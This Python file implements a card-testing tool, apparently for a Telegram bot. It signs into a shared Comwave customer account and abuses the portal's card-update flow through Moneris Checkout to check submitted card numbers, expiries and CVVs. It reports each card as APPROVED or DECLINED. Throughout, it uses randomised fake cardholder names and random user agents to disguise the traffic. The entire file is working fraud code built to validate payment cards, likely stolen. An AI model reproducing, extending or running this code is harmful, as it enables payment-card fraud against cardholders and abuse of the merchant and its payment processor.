Files
pegasusAPI/comwave_auth.py

310 lines
11 KiB
Python
Raw Permalink Normal View History

2026-03-25 02:04:52 -05:00
"""
Comwave $0 Auth Gateway Account portal card update via Moneris Checkout v1.
Single shared session, serialized ticket step, parallel Moneris processing.
"""
import asyncio
import httpx
import random
import time
import os
import logging
from fake_useragent import UserAgent
logger = logging.getLogger("comwave_auth")
def get(s, start, end):
try:
start_index = s.index(start) + len(start)
end_index = s.index(end, start_index)
return s[start_index:end_index]
except ValueError:
return ""
MONERIS_URL = "https://gateway.moneris.com/chkt/display"
IDLE_TIMEOUT = 300
KEEPALIVE_INTERVAL = 120
RATE_LIMIT_SECONDS = 3
env_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), ".env")
CW_USER = ""
CW_PASS = ""
if os.path.exists(env_path):
for line in open(env_path):
line = line.strip()
if line.startswith("COMWAVE_USERNAME="):
CW_USER = line.split("=", 1)[1]
elif line.startswith("COMWAVE_PASSWORD="):
CW_PASS = line.split("=", 1)[1]
class ComwaveChecker:
"""
Shared single-session Comwave checker for multi-user Telegram bot.
- One login shared by all users. No repeated login/logout.
- _ticket_lock serializes the fast ticket step (~0.5s each).
- Moneris validate+process runs in parallel no lock needed.
- Background tasks: idle auto-logout (5min) + keepalive ping (2min).
- Per-user rate limit prevents spam.
- Auto re-login on any session failure.
"""
def __init__(self):
self.session: httpx.AsyncClient | None = None
self.hdrs: dict = {}
self.logged_in: bool = False
self._ticket_lock = asyncio.Lock()
self._login_lock = asyncio.Lock()
self._last_activity: float = 0
self._user_cooldowns: dict[int | str, float] = {}
self._bg_task: asyncio.Task | None = None
self._pending: int = 0
def _start_bg(self):
if self._bg_task is None or self._bg_task.done():
self._bg_task = asyncio.create_task(self._bg_loop())
async def _bg_loop(self):
while True:
await asyncio.sleep(30)
if not self.logged_in:
break
idle = time.time() - self._last_activity
if idle >= IDLE_TIMEOUT and self._pending == 0:
logger.info("Idle timeout — logging out")
await self._do_logout()
break
if idle >= KEEPALIVE_INTERVAL:
try:
await self.session.get(
"https://myaccount.comwave.net/viewPayment",
headers={**self.hdrs, "Accept": "text/html"},
follow_redirects=True,
)
except Exception:
logger.warning("Keepalive ping failed — marking session dead")
self.logged_in = False
break
async def ensure_login(self) -> bool:
if self.logged_in and self.session:
return True
async with self._login_lock:
if self.logged_in and self.session:
return True
return await self._do_login()
async def _do_login(self) -> bool:
if self.session:
try:
await self.session.aclose()
except Exception:
pass
self.session = httpx.AsyncClient(timeout=40)
ua_str = UserAgent().random
self.hdrs = {"User-Agent": ua_str, "Accept-Language": "en-US,en;q=0.9"}
for attempt in range(2):
try:
r1 = await self.session.get(
"https://myaccount.comwave.net/welcome",
headers={**self.hdrs, "Accept": "text/html"},
follow_redirects=True,
)
ct = get(r1.text, 'name="currentTime" value="', '"')
fa = get(r1.text, 'action="', '"')
if not ct or not fa:
return False
r2 = await self.session.post(
f"https://myaccount.comwave.net{fa}",
data={"username": CW_USER, "password": CW_PASS, "currentTime": ct},
headers={**self.hdrs, "Content-Type": "application/x-www-form-urlencoded",
"Referer": "https://myaccount.comwave.net/welcome"},
follow_redirects=True,
)
if "already logged in" in r2.text:
await self.session.get("https://myaccount.comwave.net/logoff", follow_redirects=True)
await asyncio.sleep(2)
continue
if "Login" in (get(r2.text, "<title>", "</title>") or "Login"):
return False
self.logged_in = True
self._last_activity = time.time()
self._start_bg()
logger.info("Logged in to Comwave")
return True
except Exception as e:
logger.warning(f"Login attempt {attempt + 1} failed: {e}")
await asyncio.sleep(2)
return False
async def _do_logout(self):
if self.session:
try:
await self.session.get("https://myaccount.comwave.net/logoff", follow_redirects=True)
except Exception:
pass
try:
await self.session.aclose()
except Exception:
pass
self.session = None
self.logged_in = False
logger.info("Logged out of Comwave")
async def _get_ticket(self) -> tuple[str, str]:
r = await self.session.post(
"https://myaccount.comwave.net/toUpdatePayment",
data={"formBean.updateCreditCardButton": "updateCC"},
headers={**self.hdrs, "Content-Type": "application/x-www-form-urlencoded",
"Referer": "https://myaccount.comwave.net/viewPayment"},
follow_redirects=True,
)
ticket = get(r.text, "monerisCheckoutTicketID = '", "'")
redirect_url = str(r.url)
return ticket, redirect_url
async def _moneris_process(self, cc, mm, yyyy, cvv, ticket, redirect_url) -> str:
first_names = ["James", "John", "Robert", "Michael", "William", "David"]
last_names = ["Smith", "Johnson", "Williams", "Brown", "Jones", "Garcia"]
first_name = random.choice(first_names)
last_name = random.choice(last_names)
expiry = f"{mm}{yyyy[2:]}"
ua_str = self.hdrs["User-Agent"]
mon = httpx.AsyncClient(timeout=30, follow_redirects=True)
try:
await mon.get(f"{MONERIS_URL}/index.php?tck={ticket}",
headers={"User-Agent": ua_str, "Accept": "text/html"})
mon_hdrs = {
"User-Agent": ua_str,
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest",
"Referer": f"{MONERIS_URL}/index.php?tck={ticket}",
}
form_data = {
"ticket": ticket, "action": "validate_transaction",
"pan": cc, "expiry_date": expiry, "cvv": cvv,
"cardholder": f"{first_name} {last_name}",
"card_data_key": "new", "currency_code": "CAD",
"wallet_details": "{}", "gift_details": "{}",
}
rv = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs)
if rv.json().get("response", {}).get("success") != "true":
return "Error: validate failed"
form_data["action"] = "process_transaction"
rp = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs)
resp = rp.json().get("response", {})
if resp.get("success") != "true":
return "Error: process failed"
result = resp.get("result", "")
card_type = ""
last4 = ""
approval_code = ""
ref_no = ""
payments = resp.get("payment", [])
if payments:
p = payments[0]
card_type = p.get("card", "")
last4 = p.get("pan", "")
approval_code = p.get("approval_code", "")
ref_no = p.get("reference_no", "")
info = f"[{card_type}] | Last4: {last4} | Auth: {approval_code} | Ref: {ref_no}"
if result == "a":
if "monerischeckout" in redirect_url:
base = redirect_url.split("?")[0]
await self.session.post(base, data={"ticketID": ticket}, headers={
**self.hdrs, "Content-Type": "application/x-www-form-urlencoded",
"Accept": "application/json",
})
return f"APPROVED {info}"
else:
return f"DECLINED {info}"
finally:
await mon.aclose()
def check_rate_limit(self, user_id: int | str) -> float:
now = time.time()
last = self._user_cooldowns.get(user_id, 0)
remaining = RATE_LIMIT_SECONDS - (now - last)
return max(0, remaining)
def _touch_rate(self, user_id: int | str):
self._user_cooldowns[user_id] = time.time()
async def check_card(self, full: str, user_id: int | str = 0) -> str:
start = time.time()
wait = self.check_rate_limit(user_id)
if wait > 0:
return f"Rate limited — wait {round(wait, 1)}s"
self._touch_rate(user_id)
try:
cc, mm, yyyy, cvv = full.strip().split("|")
if len(yyyy) == 2:
yyyy = f"20{yyyy}"
except ValueError:
return "Error: bad format (cc|mm|yyyy|cvv)"
self._pending += 1
try:
if not await self.ensure_login():
self.logged_in = False
if not await self.ensure_login():
return "Error: login failed"
self._last_activity = time.time()
async with self._ticket_lock:
try:
ticket, redirect_url = await self._get_ticket()
except Exception:
ticket, redirect_url = "", ""
if not ticket:
self.logged_in = False
if not await self.ensure_login():
return "Error: re-login failed"
async with self._ticket_lock:
try:
ticket, redirect_url = await self._get_ticket()
except Exception:
ticket, redirect_url = "", ""
if not ticket:
return "Error: no ticket"
result = await self._moneris_process(cc, mm, yyyy, cvv, ticket, redirect_url)
elapsed = round(time.time() - start, 2)
return f"{result} - Taken {elapsed}s"
except Exception as e:
return f"Error: {e}"
finally:
self._pending -= 1
@property
def status(self) -> str:
if self.logged_in:
idle = round(time.time() - self._last_activity) if self._last_activity else 0
return f"🟢 Session active | {self._pending} pending | idle {idle}s"
return "🔴 Session inactive"
async def shutdown(self):
if self._bg_task and not self._bg_task.done():
self._bg_task.cancel()
await self._do_logout()
checker = ComwaveChecker()